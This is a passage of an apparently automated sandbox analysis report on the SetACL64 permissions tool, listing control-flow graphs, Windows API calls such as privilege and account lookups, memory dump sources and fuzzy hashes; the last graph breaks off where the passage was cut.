                              control_flow_graph 2919 7ff69704d304-7ff69704d30a 2920 7ff69704d65f-7ff69704d668 LeaveCriticalSection 2919->2920 2921 7ff69704d310-7ff69704d318 2919->2921 2922 7ff69704d669-7ff69704d66d 2920->2922 2923 7ff69704d31a-7ff69704d320 2921->2923 2924 7ff69704d326-7ff69704d32e 2921->2924 2927 7ff69704d6a6-7ff69704d6aa 2922->2927 2928 7ff69704d66f-7ff69704d685 2922->2928 2923->2920 2923->2924 2925 7ff69704d35b-7ff69704d35d 2924->2925 2926 7ff69704d330-7ff69704d355 GetSystemTimeAsFileTime 2924->2926 2929 7ff69704d36f-7ff69704d371 2925->2929 2930 7ff69704d35f-7ff69704d369 GetCurrentThreadId 2925->2930 2926->2925 2933 7ff69704d6ac-7ff69704d6c2 2927->2933 2934 7ff69704d6df-7ff69704d6e7 2927->2934 2931 7ff69704d687-7ff69704d69a 2928->2931 2932 7ff69704d6a0-7ff69704d6a5 call 7ff6970721a0 2928->2932 2935 7ff69704d527-7ff69704d5b0 LeaveCriticalSection call 7ff6970721d4 2929->2935 2936 7ff69704d377-7ff69704d3a4 GetUserNameExW 2929->2936 2930->2929 2931->2932 2937 7ff69704d74e-7ff69704d753 call 7ff6970788fc 2931->2937 2932->2927 2939 7ff69704d6d9-7ff69704d6de call 7ff6970721a0 2933->2939 2940 7ff69704d6c4-7ff69704d6d7 2933->2940 2941 7ff69704d71b-7ff69704d741 call 7ff697072180 2934->2941 2942 7ff69704d6e9-7ff69704d6ff 2934->2942 2963 7ff69704d5cc-7ff69704d5e9 2935->2963 2964 7ff69704d5b2-7ff69704d5bb 2935->2964 2946 7ff69704d3a6-7ff69704d3b3 GetLastError 2936->2946 2947 7ff69704d3b9-7ff69704d3e4 call 7ff697045790 GetUserNameExW 2936->2947 2951 7ff69704d754-7ff69704d759 call 7ff6970788fc 2937->2951 2939->2934 2940->2939 2940->2951 2943 7ff69704d716 call 7ff6970721a0 2942->2943 2944 7ff69704d701-7ff69704d714 2942->2944 2943->2941 2944->2943 2946->2947 2955 7ff69704d45a-7ff69704d45c 2946->2955 2969 7ff69704d3e6-7ff69704d3ee GetLastError 2947->2969 2970 7ff69704d3f0-7ff69704d3f7 2947->2970 2955->2935 2961 7ff69704d462-7ff69704d4c9 call 7ff697040520 call 7ff69703a740 2955->2961 2997 7ff69704d4cb-7ff69704d4d2 2961->2997 2998 7ff69704d51c-7ff69704d526 call 7ff697039720 2961->2998 2966 7ff69704d5eb-7ff69704d600 call 7ff697043f80 2963->2966 2967 7ff69704d605-7ff69704d60c 2963->2967 2971 7ff69704d5bd 2964->2971 2972 7ff69704d5c1-7ff69704d5c7 call 7ff697043f80 2964->2972 2966->2967 2975 7ff69704d62b-7ff69704d62e 2967->2975 2976 7ff69704d60e-7ff69704d627 call 7ff697043f80 2967->2976 2978 7ff69704d41a-7ff69704d41d 2969->2978 2979 7ff69704d400-7ff69704d409 2970->2979 2971->2972 2972->2963 2982 7ff69704d64a-7ff69704d65d call 7ff69704ea60 2975->2982 2983 7ff69704d630-7ff69704d639 2975->2983 2976->2975 2978->2955 2980 7ff69704d41f-7ff69704d437 2978->2980 2979->2979 2985 7ff69704d40b-7ff69704d417 call 7ff697043f80 2979->2985 2986 7ff69704d439-7ff69704d44c 2980->2986 2987 7ff69704d452-7ff69704d455 call 7ff6970721a0 2980->2987 2982->2922 2989 7ff69704d63b 2983->2989 2990 7ff69704d63e-7ff69704d649 call 7ff697043f80 2983->2990 2985->2978 2986->2987 2995 7ff69704d748-7ff69704d74d call 7ff6970788fc 2986->2995 2987->2955 2989->2990 2990->2982 2995->2937 3003 7ff69704d4f7-7ff69704d502 2997->3003 3004 7ff69704d4d4-7ff69704d4dd 2997->3004 2998->2935 3003->2998 3006 7ff69704d504-7ff69704d50d 3003->3006 3009 7ff69704d4e2-7ff69704d4f2 call 7ff697043f80 3004->3009 3010 7ff69704d4df 3004->3010 3011 7ff69704d512-7ff69704d51b call 7ff697043f80 3006->3011 3012 7ff69704d50f 3006->3012 3009->3003 3010->3009 3011->2998 3012->3011
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
                              • String ID:
                              • API String ID: 3424761043-0
                              • Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                              • Instruction ID: ab50fb5e798c2482293c598b9ebf8d672711836907aabe1d25d22cc8e2dad85a
                              • Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                              • Instruction Fuzzy Hash: A3C1BBB2B08A4296EB20DF64E4842AC23B1FB55BD8F4042B5DB5DD7799EF38E544D340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3017 7ff69706f3c0-7ff69706f3e8 3018 7ff69706f3ed-7ff69706f409 3017->3018 3019 7ff69706f3ea 3017->3019 3020 7ff69706f40b 3018->3020 3021 7ff69706f40e-7ff69706f412 3018->3021 3019->3018 3020->3021 3022 7ff69706f419-7ff69706f41e 3021->3022 3023 7ff69706f414-7ff69706f417 3021->3023 3024 7ff69706f423-7ff69706f45c LookupAccountNameW GetLastError 3022->3024 3025 7ff69706f420 3022->3025 3023->3024 3026 7ff69706f469-7ff69706f487 3024->3026 3027 7ff69706f45e-7ff69706f464 GetLastError 3024->3027 3025->3024 3029 7ff69706f489-7ff69706f490 3026->3029 3030 7ff69706f4e6-7ff69706f4fd call 7ff697045790 3026->3030 3028 7ff69706f62f-7ff69706f646 3027->3028 3032 7ff69706f4bb-7ff69706f4c3 call 7ff6970721d4 3029->3032 3033 7ff69706f492-7ff69706f499 3029->3033 3038 7ff69706f502-7ff69706f507 3030->3038 3039 7ff69706f4ff 3030->3039 3045 7ff69706f4c6-7ff69706f4e1 call 7ff697074d90 3032->3045 3035 7ff69706f653-7ff69706f658 Concurrency::cancel_current_task 3033->3035 3036 7ff69706f49f-7ff69706f4a7 call 7ff6970721d4 3033->3036 3048 7ff69706f64d-7ff69706f652 call 7ff6970788fc 3036->3048 3049 7ff69706f4ad-7ff69706f4b9 3036->3049 3042 7ff69706f509-7ff69706f50c 3038->3042 3043 7ff69706f50e-7ff69706f513 3038->3043 3039->3038 3046 7ff69706f518-7ff69706f555 LookupAccountNameW 3042->3046 3043->3046 3047 7ff69706f515 3043->3047 3045->3030 3051 7ff69706f557-7ff69706f55f GetLastError 3046->3051 3052 7ff69706f561-7ff69706f568 3046->3052 3047->3046 3048->3035 3049->3045 3055 7ff69706f5bb-7ff69706f5be 3051->3055 3056 7ff69706f570-7ff69706f579 3052->3056 3058 7ff69706f5f9-7ff69706f5fc 3055->3058 3059 7ff69706f5c0-7ff69706f5d9 3055->3059 3056->3056 3060 7ff69706f57b-7ff69706f589 call 7ff697043f80 3056->3060 3064 7ff69706f62d 3058->3064 3065 7ff69706f5fe-7ff69706f608 3058->3065 3061 7ff69706f5db-7ff69706f5ee 3059->3061 3062 7ff69706f5f0-7ff69706f5f8 call 7ff6970721a0 3059->3062 3060->3055 3075 7ff69706f58b-7ff69706f58e 3060->3075 3061->3062 3066 7ff69706f647-7ff69706f64c call 7ff6970788fc 3061->3066 3062->3058 3064->3028 3069 7ff69706f60a-7ff69706f61d 3065->3069 3070 7ff69706f622-7ff69706f628 call 7ff6970721a0 3065->3070 3066->3048 3069->3048 3071 7ff69706f61f 3069->3071 3070->3064 3071->3070 3075->3055 3077 7ff69706f590-7ff69706f59b IsValidSid 3075->3077 3077->3055 3078 7ff69706f59d-7ff69706f5a4 3077->3078 3079 7ff69706f5a6-7ff69706f5ab call 7ff69707d6ac 3078->3079 3080 7ff69706f5af-7ff69706f5b7 call 7ff69706ec20 3078->3080 3079->3080 3080->3055
                              APIs
                              • LookupAccountNameW.ADVAPI32 ref: 00007FF69706F44D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F453
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F45E
                              • LookupAccountNameW.ADVAPI32 ref: 00007FF69706F54D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F557
                              • IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F593
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F647
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F64D
                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69706F653
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
                              • String ID:
                              • API String ID: 311209037-0
                              • Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                              • Instruction ID: b41ce472b9cf1156b1881b72c8fddd1e868fe3a8258eef19343cd7eee5a38216
                              • Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                              • Instruction Fuzzy Hash: 7671A4A2A19B8281EA349F15A85437D73A5FB84BE4F144371EA5DC7BD8DF7CE6808340

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3085 7ff697053fd8-7ff697054008 AdjustTokenPrivileges 3086 7ff69705400a-7ff697054012 GetLastError 3085->3086 3087 7ff697054023-7ff697054036 GetLastError CloseHandle 3085->3087 3086->3087 3088 7ff697054014-7ff697054021 CloseHandle 3086->3088 3089 7ff697054037-7ff697054040 3087->3089 3088->3089 3090 7ff697054079-7ff697054095 3089->3090 3091 7ff697054042-7ff697054059 3089->3091 3094 7ff697054097-7ff6970540ae 3090->3094 3095 7ff6970540ce-7ff6970540d0 3090->3095 3092 7ff69705405b-7ff69705406e 3091->3092 3093 7ff697054074 call 7ff6970721a0 3091->3093 3092->3093 3098 7ff69705441f-7ff697054424 call 7ff6970788fc 3092->3098 3093->3090 3100 7ff6970540c9 call 7ff6970721a0 3094->3100 3101 7ff6970540b0-7ff6970540c3 3094->3101 3096 7ff6970540d6-7ff69705415c call 7ff697043f80 * 2 call 7ff69704d260 3095->3096 3097 7ff6970541d8-7ff697054209 3095->3097 3148 7ff697054196-7ff69705419f 3096->3148 3149 7ff69705415e-7ff697054175 3096->3149 3106 7ff69705420b-7ff69705420e 3097->3106 3107 7ff697054268-7ff697054294 3097->3107 3102 7ff697054425-7ff69705442a call 7ff6970788fc 3098->3102 3100->3095 3101->3100 3101->3102 3121 7ff69705442b-7ff697054430 call 7ff6970788fc 3102->3121 3111 7ff697054210-7ff697054220 3106->3111 3112 7ff697054296-7ff697054299 3107->3112 3113 7ff697054314-7ff697054320 3107->3113 3116 7ff697054239-7ff697054266 3111->3116 3117 7ff697054222-7ff697054233 call 7ff69706e4b0 3111->3117 3120 7ff6970542a0-7ff6970542b4 3112->3120 3118 7ff697054322-7ff69705432c call 7ff69706e4b0 3113->3118 3119 7ff697054335-7ff697054341 3113->3119 3116->3107 3116->3111 3117->3116 3143 7ff697054356-7ff69705435b 3117->3143 3135 7ff697054331-7ff697054333 3118->3135 3125 7ff69705435d-7ff697054367 call 7ff697054810 3119->3125 3126 7ff697054343-7ff697054354 call 7ff69706e4b0 3119->3126 3127 7ff6970542cd-7ff6970542d2 3120->3127 3128 7ff6970542b6-7ff6970542c7 call 7ff69706e4b0 3120->3128 3145 7ff697054369-7ff697054372 3125->3145 3146 7ff6970543b1-7ff6970543dc call 7ff697072180 3125->3146 3126->3125 3126->3143 3130 7ff6970542ea-7ff697054312 3127->3130 3131 7ff6970542d4-7ff6970542e8 call 7ff69706e4b0 3127->3131 3128->3127 3128->3143 3130->3113 3130->3120 3131->3130 3131->3143 3135->3119 3135->3143 3143->3146 3151 7ff697054374-7ff697054396 call 7ff69705a350 3145->3151 3152 7ff69705439e-7ff6970543a1 3145->3152 3148->3097 3150 7ff6970541a1-7ff6970541b8 3148->3150 3153 7ff697054177-7ff69705418a 3149->3153 3154 7ff697054190-7ff697054195 call 7ff6970721a0 3149->3154 3156 7ff6970541ba-7ff6970541cd 3150->3156 3157 7ff6970541d3 call 7ff6970721a0 3150->3157 3151->3146 3169 7ff697054398 3151->3169 3159 7ff6970543a3-7ff6970543aa call 7ff69706b2b0 3152->3159 3160 7ff6970543af 3152->3160 3153->3121 3153->3154 3154->3148 3156->3157 3163 7ff6970543dd-7ff69705441e call 7ff6970788fc * 11 3156->3163 3157->3097 3159->3160 3160->3146 3163->3098 3169->3152
                              APIs
                              Strings
                              • Prepare, xrefs: 00007FF697054124
                              • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast$AdjustPrivilegesToken
                              • String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
                              • API String ID: 1992325626-2245062721
                              • Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                              • Instruction ID: 19ab5396a8df83d1d24d2fc48c66810c60eeb97ac8594a5bb6f166d3626e44c5
                              • Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                              • Instruction Fuzzy Hash: 89A161B2B1974682EE24CB66E4443A963A1FB94BE4F505135EA5DC77E4DFBCE180C700

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3279 7ff697086c40-7ff697086c9c call 7ff697083e64 3282 7ff697086cb5-7ff697086cbc 3279->3282 3283 7ff697086c9e-7ff697086cb2 call 7ff697086ba4 3279->3283 3284 7ff697086d0b call 7ff69708648c 3282->3284 3285 7ff697086cbe-7ff697086cc5 3282->3285 3283->3282 3292 7ff697086d10-7ff697086d14 3284->3292 3288 7ff697086cc7-7ff697086ccc call 7ff697086534 3285->3288 3289 7ff697086cce call 7ff697086604 3285->3289 3297 7ff697086cd3-7ff697086cd7 3288->3297 3289->3297 3295 7ff697086e6d 3292->3295 3296 7ff697086d1a-7ff697086d25 3292->3296 3301 7ff697086e6f-7ff697086e8d 3295->3301 3298 7ff697086d27-7ff697086d2b 3296->3298 3299 7ff697086d35-7ff697086d38 call 7ff697086a74 3296->3299 3297->3296 3300 7ff697086cd9-7ff697086cef call 7ff697086ba4 3297->3300 3298->3299 3302 7ff697086d2d-7ff697086d33 GetACP 3298->3302 3305 7ff697086d3d-7ff697086d41 3299->3305 3300->3292 3308 7ff697086cf1-7ff697086cfb 3300->3308 3302->3305 3305->3295 3307 7ff697086d47-7ff697086d4c 3305->3307 3307->3295 3309 7ff697086d52-7ff697086d5d IsValidCodePage 3307->3309 3310 7ff697086cfd-7ff697086d02 call 7ff697086534 3308->3310 3311 7ff697086d04-7ff697086d09 call 7ff697086604 3308->3311 3309->3295 3313 7ff697086d63-7ff697086d66 3309->3313 3310->3292 3311->3292 3316 7ff697086d6b-7ff697086d6e 3313->3316 3317 7ff697086d68 3313->3317 3319 7ff697086e66-7ff697086e6b 3316->3319 3320 7ff697086d74-7ff697086d7f 3316->3320 3317->3316 3319->3301 3321 7ff697086d83-7ff697086d8b 3320->3321 3321->3321 3322 7ff697086d8d-7ff697086da2 call 7ff6970852dc 3321->3322 3325 7ff697086da8-7ff697086dbe call 7ff697087eb0 3322->3325 3326 7ff697086e8e-7ff697086f1b call 7ff69707892c call 7ff697083e64 * 2 call 7ff697087448 GetLocaleInfoW 3322->3326 3325->3295 3332 7ff697086dc4-7ff697086de3 call 7ff697087eb0 3325->3332 3343 7ff697086f1d-7ff697086f22 3326->3343 3344 7ff697086f24-7ff697086f37 call 7ff69708c558 3326->3344 3332->3295 3338 7ff697086de9-7ff697086df9 call 7ff6970931a0 3332->3338 3345 7ff697086e0b-7ff697086e22 call 7ff697087eb0 3338->3345 3346 7ff697086dfb-7ff697086e09 call 7ff6970931a0 3338->3346 3349 7ff697086f63-7ff697086f8b call 7ff697072180 3343->3349 3357 7ff697086f59-7ff697086f60 3344->3357 3358 7ff697086f39 3344->3358 3345->3295 3355 7ff697086e24-7ff697086e31 3345->3355 3346->3345 3346->3355 3359 7ff697086e33-7ff697086e4e call 7ff6970852dc 3355->3359 3360 7ff697086e52-7ff697086e61 call 7ff69708da08 3355->3360 3357->3349 3361 7ff697086f40-7ff697086f43 3358->3361 3359->3326 3367 7ff697086e50 3359->3367 3360->3319 3361->3357 3364 7ff697086f45-7ff697086f4e 3361->3364 3364->3361 3366 7ff697086f50-7ff697086f56 3364->3366 3366->3357 3367->3319
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLastNameTranslate$CodePageValid
                              • String ID: utf8
                              • API String ID: 2136749100-905460609
                              • Opcode ID: 6bdea75530d7039159817e5ab3c7b28df4470465f8a0306e69d102c21d090332
                              • Instruction ID: 6a3644c7b09ff5e121b3f9298c8bb6c76137f6214e9082137c2f1e20dc6e0b2d
                              • Opcode Fuzzy Hash: 6bdea75530d7039159817e5ab3c7b28df4470465f8a0306e69d102c21d090332
                              • Instruction Fuzzy Hash: 0F917BB2A08782C6EB349F21D4412F923A4EB94BC4F4541B2DA8DC7786EF3EE951C701
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Create$Event$Mutex
                              • String ID:
                              • API String ID: 646228171-0
                              • Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                              • Instruction ID: 0ae98acd666d16229f879231f769257192467602d343f4b184e5fff8884a0570
                              • Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                              • Instruction Fuzzy Hash: 3C015EF1D18A5281F774CB24AC4272137A2EF54790FA44675D54AC15A0DFBD72414600
                              APIs
                              • GetLastError.KERNEL32 ref: 00007FF69708B7F1
                                • Part of subcall function 00007FF697084FDC: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69708403D,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697085031
                                • Part of subcall function 00007FF697085054: HeapFree.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708506A
                                • Part of subcall function 00007FF697085054: GetLastError.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708507C
                                • Part of subcall function 00007FF697090AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF697090B0E
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3806578645-0
                              • Opcode ID: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
                              • Instruction ID: f5a8db54e0720720727a3865258b912a93a457fe18951e596a3d2c49fb993973
                              • Opcode Fuzzy Hash: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
                              • Instruction Fuzzy Hash: 7641D5A1F0924741EA709B2668517FAA680FF94BC0F18417AEE5DC7BC1FE3EE4018700
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3827717455-0
                              • Opcode ID: 177ebafa814932736604c983462749e15f512918868e0eeccc23599b249f1295
                              • Instruction ID: a4661bed0cd9582bf598aad0b8f0fac5916502bc278c261d30a3165cf583760a
                              • Opcode Fuzzy Hash: 177ebafa814932736604c983462749e15f512918868e0eeccc23599b249f1295
                              • Instruction Fuzzy Hash: 18C1B2A6A1868285EB70DB66D8107FE27A0FB947C8F404176DE8DC7699EF3CE545C700

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1530 7ff697053a20-7ff697053ac6 GetLastError 1532 7ff697053ac8-7ff697053adf 1530->1532 1533 7ff697053aff-7ff697053b1b 1530->1533 1534 7ff697053afa call 7ff6970721a0 1532->1534 1535 7ff697053ae1-7ff697053af4 1532->1535 1536 7ff697053b1d-7ff697053b34 1533->1536 1537 7ff697053b54-7ff697053b56 1533->1537 1534->1533 1535->1534 1540 7ff6970543fb-7ff697054400 call 7ff6970788fc 1535->1540 1542 7ff697053b36-7ff697053b49 1536->1542 1543 7ff697053b4f call 7ff6970721a0 1536->1543 1538 7ff697053b5c-7ff697053be2 call 7ff697043f80 * 2 call 7ff69704d260 1537->1538 1539 7ff697053c5e-7ff697053d83 call 7ff697043f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1537->1539 1566 7ff697053c1c-7ff697053c25 1538->1566 1567 7ff697053be4-7ff697053bfb 1538->1567 1568 7ff697053dbc-7ff697053dd8 1539->1568 1569 7ff697053d85-7ff697053d9c 1539->1569 1546 7ff697054401-7ff697054406 call 7ff6970788fc 1540->1546 1542->1543 1542->1546 1543->1537 1556 7ff697054407-7ff69705440c call 7ff6970788fc 1546->1556 1565 7ff69705440d-7ff697054412 call 7ff6970788fc 1556->1565 1589 7ff697054413-7ff697054418 call 7ff6970788fc 1565->1589 1566->1539 1577 7ff697053c27-7ff697053c3e 1566->1577 1573 7ff697053bfd-7ff697053c10 1567->1573 1574 7ff697053c16-7ff697053c1b call 7ff6970721a0 1567->1574 1570 7ff697053dda-7ff697053df1 1568->1570 1571 7ff697053e11-7ff697053e13 1568->1571 1575 7ff697053db7 call 7ff6970721a0 1569->1575 1576 7ff697053d9e-7ff697053db1 1569->1576 1578 7ff697053e0c call 7ff6970721a0 1570->1578 1579 7ff697053df3-7ff697053e06 1570->1579 1580 7ff697053f1b-7ff697054040 call 7ff697043f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1571->1580 1581 7ff697053e19-7ff697053e9f call 7ff697043f80 * 2 call 7ff69704d260 1571->1581 1573->1556 1573->1574 1574->1566 1575->1568 1576->1565 1576->1575 1585 7ff697053c59 call 7ff6970721a0 1577->1585 1586 7ff697053c40-7ff697053c53 1577->1586 1578->1571 1579->1578 1579->1589 1616 7ff697054079-7ff697054095 1580->1616 1617 7ff697054042-7ff697054059 1580->1617 1618 7ff697053ed9-7ff697053ee2 1581->1618 1619 7ff697053ea1-7ff697053eb8 1581->1619 1585->1539 1586->1585 1587 7ff6970543dd-7ff6970543fa call 7ff6970788fc * 5 1586->1587 1587->1540 1605 7ff697054419-7ff69705441e call 7ff6970788fc 1589->1605 1614 7ff69705441f-7ff697054424 call 7ff6970788fc 1605->1614 1640 7ff697054425-7ff69705442a call 7ff6970788fc 1614->1640 1627 7ff697054097-7ff6970540ae 1616->1627 1628 7ff6970540ce-7ff6970540d0 1616->1628 1623 7ff69705405b-7ff69705406e 1617->1623 1624 7ff697054074 call 7ff6970721a0 1617->1624 1618->1580 1621 7ff697053ee4-7ff697053efb 1618->1621 1625 7ff697053eba-7ff697053ecd 1619->1625 1626 7ff697053ed3-7ff697053ed8 call 7ff6970721a0 1619->1626 1630 7ff697053efd-7ff697053f10 1621->1630 1631 7ff697053f16 call 7ff6970721a0 1621->1631 1623->1614 1623->1624 1624->1616 1625->1605 1625->1626 1626->1618 1637 7ff6970540c9 call 7ff6970721a0 1627->1637 1638 7ff6970540b0-7ff6970540c3 1627->1638 1632 7ff6970540d6-7ff69705415c call 7ff697043f80 * 2 call 7ff69704d260 1628->1632 1633 7ff6970541d8-7ff697054209 1628->1633 1630->1587 1630->1631 1631->1580 1691 7ff697054196-7ff69705419f 1632->1691 1692 7ff69705415e-7ff697054175 1632->1692 1644 7ff69705420b-7ff69705420e 1633->1644 1645 7ff697054268-7ff697054294 1633->1645 1637->1628 1638->1637 1638->1640 1661 